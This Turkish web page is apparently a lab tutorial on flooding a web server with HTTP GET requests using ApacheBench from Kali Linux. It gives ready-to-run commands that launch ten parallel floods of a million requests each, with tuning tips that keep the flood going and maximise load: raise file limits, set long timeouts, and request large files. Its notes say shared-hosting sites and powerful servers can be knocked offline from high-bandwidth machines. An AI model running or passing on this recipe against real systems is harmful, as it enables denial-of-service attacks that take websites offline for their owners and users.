AB Tool'u ile Bir Web Sunucuya GET Flood DoS Saldırısı | ||||||||
(+) Birebir aşağıdaki bilgisayarlarda denenmiştir ve başarılı olunmuştur.
* Ubuntu 22.04 LTS Linux Host ve Virtualbox
* Windows 10 Home Premium Host ve Virtualbox (*) Uyarı: Post flood için hedef sunucuda yeterince yük oluşturulamadığından dökümanda yer verilmemiştir. Gereksinimler
Not: Get Flood DoS - Ubuntu 18.04 LTS VM kurulumu için bkz. Yaz Tatili - 2014/Zafiyetli VM Makina Hazırlama Dökümanları/GET Flood DoS - Ubuntu 18.04 LTS VM Hazırlama Saldırı Adımları 1. Kali Linux VM ayarları şöyle yapılır:
32 GB RAM
4 CPU 2. Get Flood DoS - Ubuntu 18.04 LTS VM ayarları şöyle yapılır:
512 MB RAM
1 CPU 3. Kali Linux VM’den hedef web adrese erişilir ve sayfanın anlık cevap verebildiği gözlemlenir. 4. Ardından Kali Linux VM’de 9 adet ab tool’u çalıştırılır ve erişimler tekrar denendiğinde oldukça yavaşlık yaşandığı ve erişimlerin durduğu gözlemlenir.
(*) Uyarı:
Hedef web sunucuda daha çok kaynak tüketmek için “get flood” saldırısını hedef web adresteki büyük bir dosyayı talep edilecek şekilde başlatırız. Bu saldırıda yaklaşık 1,2 GB’lık ikTestMakinası imajı olan test.ova dosyası get ile tekrarlı talep edilecektir. Kali Linux Terminal 1: sudo su ulimit -n 1000000 ab -s 10000 -c 100 -n 1000000 "http://HEDEF_WEB_SUNUCU_ADRESI/test.ova" Not: -s : Http Yanıtını Bekleme Timeout Süresi (Default’ta 30 saniyedir) -c : Eşzamanlı istek sayısı // concurrent client (browser) -n : Toplam gönderilecek http istek sayısı Kali Linux Terminal 2: sudo su ulimit -n 1000000 ab -s 10000 -c 100 -n 1000000 "http://HEDEF_WEB_SUNUCU_ADRESI/test.ova" Kali Linux Terminal 3: sudo su ulimit -n 1000000 ab -s 10000 -c 100 -n 1000000 "http://HEDEF_WEB_SUNUCU_ADRESI/test.ova" Kali Linux Terminal 4: sudo su ulimit -n 1000000 ab -s 10000 -c 100 -n 1000000 "http://HEDEF_WEB_SUNUCU_ADRESI/test.ova" Kali Linux Terminal 5: sudo su ulimit -n 1000000 ab -s 10000 -c 100 -n 1000000 "http://HEDEF_WEB_SUNUCU_ADRESI/test.ova" Kali Linux Terminal 6: sudo su ulimit -n 1000000 ab -s 10000 -c 100 -n 1000000 "http://HEDEF_WEB_SUNUCU_ADRESI/test.ova" Kali Linux Terminal 7: sudo su ulimit -n 1000000 ab -s 10000 -c 100 -n 1000000 "http://HEDEF_WEB_SUNUCU_ADRESI/test.ova" Kali Linux Terminal 8: sudo su ulimit -n 1000000 ab -s 10000 -c 100 -n 1000000 "http://HEDEF_WEB_SUNUCU_ADRESI/test.ova" Kali Linux Terminal 9: sudo su ulimit -n 1000000 ab -s 10000 -c 100 -n 1000000 "http://HEDEF_WEB_SUNUCU_ADRESI/test.ova" ( veya ) Kali Linux Terminal X: sudo su ulimit -n 1000000 for i in {1..10}; do ab -s 240 -c 100 -n 1000000 http://HEDEF_WEB_SUNUCU_ADRESI/test.ova & done 5. Saldırı ile hedef web adrese erişim denendiğinde erişimler yavaşlar ve durur. Sonuç İlk 5 dakika içerisindeyken erişimler ara ara gelebiliyor ama saldırı olmadığı duruma göre yavaşlık oldukça hissediliyor. 5 dakika sonra ise erişimler tamamen gidiyor. Zaman zaman erişimlerin anlık geldiği durumlar da yaşanmıştır. Fakat genel itibariyle sunucu üretilen trafikle baş edememektedir ve servis dışı kalmaktadır. Uyarı Bu saldırı bir lab ortamında uygulanmaktadır. Saldırıda hedef web sunucu vm’in kaynakları özellikle düşük tutulmuştur. Çünkü saldırı performansı düşük bir bilgisayardan yapılmaktadır. Performansı yüksek ve upload bant genişliği yüksek bir bilgisayardan (veya sunucudan) aynı saldırı aynı tool ile yapıldığında performansı yüksek web sunucular servis dışı bırakılabilir. Notlar
- Örnek olarak aşağıdaki komut 50 concurrent clients (eşzamanlı istemci) ve UUID: my-uuid şeklindeki örnek custom bir header’la 10000 GET isteği göndermektedir.
ab -n 10000 -c 50 -H "UUID: my-uuid" http://localhost:8081/v1/clients - GET flood'u hedef web adreste index.html sayfasına yapınca saldırı başarılı olmuyor. Dolayısıyla büyük bir dosyaya get flood yapmak saldırının başarılı olması açısından önemli. - Saldırı öncesi site erişimi çok seri iken saldırı sırasında bağlantı oldukça yavaşlamaktadır ve çoğu zaman da erişim durmuştur. - -s parametresi 10000 saniye (yani 16 küsür saat) şeklinde olsun. Çünkü yanıtlar geç gelince komut timeout diyor ve çalışmayı durduruyor. Halbuki biz komut yanıt alamasa da veya geç yanıt alsa da sürekli istek paketleri göndersin ve sunucuyu meşgul etsin istiyoruz. Yanıtlar sunucudan gelebilir olduğunda komut çalışmaya devam edeceği için yine yoğunluk bu parametre sayesinde uygulayabilecektir. Dolayısıyla -s timeout süresini yüksek tutarız. - Saldırı durdurulduğunda belli bir müddet sunucuya erişimler halen gerçekleşemeyecektir. Belli bir müddet sonunda erişimler gelecektir. - Kurban VM’in içerisinde web tarayıcıdan localhost’tan giderek
http://localhost/server-status
adresinden sunucudaki yük gözlemlenebilir. Fakat sunucu saldırıda servis dışı kaldığında bu sayfa yoğunluktan dolayı görüntülenemeyebilir. - Hosting firmalarına yapılan http get flood saldırıları kolaylıkla başarılı olabilmektedir. Çünkü hosting firmaları tek sunucuda birden fazla web uygulama barındırmaktadır ve tek sunucuda barınan web uygulamalara azar azar kaynak paylaştırmaktadırlar. Bu nedenle yüksek performanslı donanıma sahip yüksek bant genişlikli internete sahip bir sistemden saldırı yapılmasa dahi bu tarz hedeflerde saldırılar başarılı olabilmektedir. - Ana makinanda ab tool’u ile bu saldırıyı başlatma! Tekrarlı başlatınca bir süre sonra ana makine kaynakları doluyor ve ana makina kitleniyor. Dolayısıyla saldırıyı lab ortamı gereği Kali Linux VM gibi bir sanal makinada başlat. Bu sayede sanal makina kitlense de ana makina çalışmasını sürdürebilecektir. Sanal makinanın kitlendiğine ise rastlanmamıştır. - Saldırı ab -c 100 -n 1000000 "http://192.168.56.125/test.ova" ile yapılınca erişim başarılı şekilde durdurulmakta. Fakat örneğin -c 1000 yapıldığında bir süre sonra ab tool çalışması terminated oluyor ve tool çalışmayı durduruyor. Bu nedenle düşük performanslı sistemim için en stabil parametre ayarı -c 100 şeklinde. - Örneğin kurumsal X sunucusunda 100 adet ab başlatıldığında 100 adetle saldırı durmadan sürdürülebiliyordu. Fakat sanal kali sisteminde saldırı 10 ab ile başlatıldığında 6 ab komutu saldırı sırasında duruyor. Çünkü sistem kaynakları yetersiz kalıyor.
Kali 2021.2 Terminal Output:
apr_socket_recv: Connection reset by peer (104) apr_socket_recv: Connection reset by peer (104) [11] + exit 104 ab -s 240 -c 100 -n 1000000 http://192.168.56.125/test.ova [7] exit 104 ab -s 240 -c 100 -n 1000000 http://192.168.56.125/test.ova apr_socket_recv: Connection reset by peer (104) apr_socket_recv: Connection reset by peer (104) [10] + exit 104 ab -s 240 -c 100 -n 1000000 http://192.168.56.125/test.ova [4] exit 104 ab -s 240 -c 100 -n 1000000 http://192.168.56.125/test.ova apr_socket_recv: Connection reset by peer (104) [8] - exit 104 ab -s 240 -c 100 -n 1000000 http://192.168.56.125/test.ova [3] + exit 119 ab -s 240 -c 100 -n 1000000 http://192.168.56.125/test.ova - [!] Uyarı: Kali 2021.2 VM de saldırı sırasında kali sürümündeki bug’dan dolayı ip gidebiliyor ve ab komutları çalışsa da network unreachable olduğundan ve paketler hedef web sunucuya varamadığından web sunucudaki adrese erişimler gelebiliyor. Bu nedenle ip tekrar aldırıp saldırıyı tekrar başlatmak gerekir. Kali 2021.2 Linux VM: sudo su dhclient ifconfig ulimit -n 1000000 for i in {1..10}; do ab -s 240 -c 100 -n 1000000 http://HEDEF_WEB_SUNUCU_ADRESI/test.ova & done EK: Demo Video EK: Materyaller Yararlanılan Kaynaklar
|
||||||||
Bu yazı 11.09.2024 tarihinde, saat 22:51:05'de yazılmıştır. 12.09.2024 tarihi ve 14:07:03 saatinde ise güncellenmiştir. | ||||||||
|
||||||||
Yorumlar |
||||||||
Henüz yorum girilmemiştir. | ||||||||
Yorum Ekle | ||||||||